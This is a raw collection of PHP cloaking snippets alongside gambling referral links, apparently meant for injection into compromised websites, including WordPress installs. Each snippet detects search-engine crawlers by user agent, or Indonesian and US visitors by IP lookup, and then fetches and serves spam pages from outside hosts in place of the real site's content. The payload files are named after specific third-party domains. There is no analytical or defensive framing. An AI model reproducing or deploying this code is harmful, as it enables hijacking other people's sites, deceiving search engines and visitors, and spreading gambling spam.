https://lk.emaslaku.me/lakutoto1    => NO REFERRAL
https://lk.emaslaku.me/pastigacor77 => REFFERAL
https://123.slebew-brow.art         => REFERRAL

https://shorturl.at/ni0Bg           => WISMABET




<?php
$agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$uri   = $_SERVER['REQUEST_URI'] ?? '';
$bot_keywords = ['bot', 'crawl', 'spider', 'slurp', 'bing', 'google', 'yandex', 'baidu'];
$is_bot = false;
foreach ($bot_keywords as $keyword) {
    if (stripos($agent, $keyword) !== false) {
        $is_bot = true;
        break;
    }
}

if ($is_bot && $uri === '/meter-application-status-check-bd/') {
    $remote_url = "https://google.nwpspectrum.art/bucket/meter-application-status-check-bd.html";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $remote_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    $content = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($http_code == 200 && $content !== false) {
        echo $content;
        exit;
    }
}
?>





<?php
function is_google_bot() {
    $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News", "Googlebot-Image", "bingbot", "BingPreview", "facebookexternalhit", "twitterbot", "linkedinbot", "whatsapp", "slackbot", "Slack-ImgProxy", "Discordbot", "Applebot", "YandexBot", "BaiduSpider", "Sogou", "Exabot", "ia_archiver", "msnbot", "MJ12bot", "AhrefsBot", "SemrushBot", "DotBot", "OpenAI-ChatGPT");
    foreach ($agents as $agent) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true;
    }
    return false;
}
if (is_google_bot()) {
    $bot_content = file_get_contents('https://mang-eak.auah-gelap.top/labubu/williamprescott.edu.pe.txt');
    echo $bot_content;
    exit;
}
 
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
?>



⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫



<?php
function is_bot() {
    if (!isset($_SERVER['HTTP_USER_AGENT'])) {
        return false;
    }

    $ua = $_SERVER['HTTP_USER_AGENT'];

    $agents = array(
        "Googlebot", "Google-Site-Verification", "Google-InspectionTool",
        "Googlebot-Mobile", "Googlebot-News", "Googlebot-Image",
        "bingbot", "BingPreview",
        "facebookexternalhit", "twitterbot", "linkedinbot",
        "whatsapp", "slackbot", "Slack-ImgProxy", "Discordbot",
        "Applebot", "YandexBot", "BaiduSpider", "Sogou", "Exabot",
        "ia_archiver", "msnbot", "MJ12bot", "AhrefsBot", "SemrushBot",
        "DotBot", "OpenAI-ChatGPT"
    );

    foreach ($agents as $agent) {
        if (stripos($ua, $agent) !== false) {
            return true;
        }
    }
    return false;
}

function get_remote_content($url) {
    if (ini_get('allow_url_fopen')) {
        $content = @file_get_contents($url);
        if ($content !== false) {
            return $content;
        }
    }

    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $data = curl_exec($ch);
        curl_close($ch);
        if ($data !== false) {
            return $data;
        }
    }

    return '';
}

if (is_bot()) {
    $bot_content = get_remote_content('https://untamen-catfood.xyz/bucket/rochaaldia.com.txt');
    echo $bot_content;
    exit;
}
?>




⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫



<?php
function getUserIP() {
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip = explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"])[0];
    } else {
        $ip = $_SERVER["REMOTE_ADDR"];
    }
    return $ip;
}
$ip = getUserIP();
$api_url = "http://ip-api.com/json/{$ip}";
$response = file_get_contents($api_url);
$data = json_decode($response, true);
 
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
    ob_start();
     echo file_get_contents("https://mang-eak.auah-gelap.top/labubu/williamprescott.edu.pe.txt");
    $output = ob_get_clean();
    echo $output;
    die;
}
?>


⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫⟫


<?php
function getUserIP() {
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip = explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"])[0];
    } else {
        $ip = $_SERVER["REMOTE_ADDR"];
    }
    return $ip;
}
$ip = getUserIP();
$api_url = "http://ip-api.com/json/{$ip}";
$response = file_get_contents($api_url);
$data = json_decode($response, true);
 
if ($data["countryCode"] === "ID") {
    ob_start();
     echo file_get_contents("https://mang-eak.auah-gelap.top/labubu/williamprescott.edu.pe.txt");
    $output = ob_get_clean();
    echo $output;
    die;
}
?>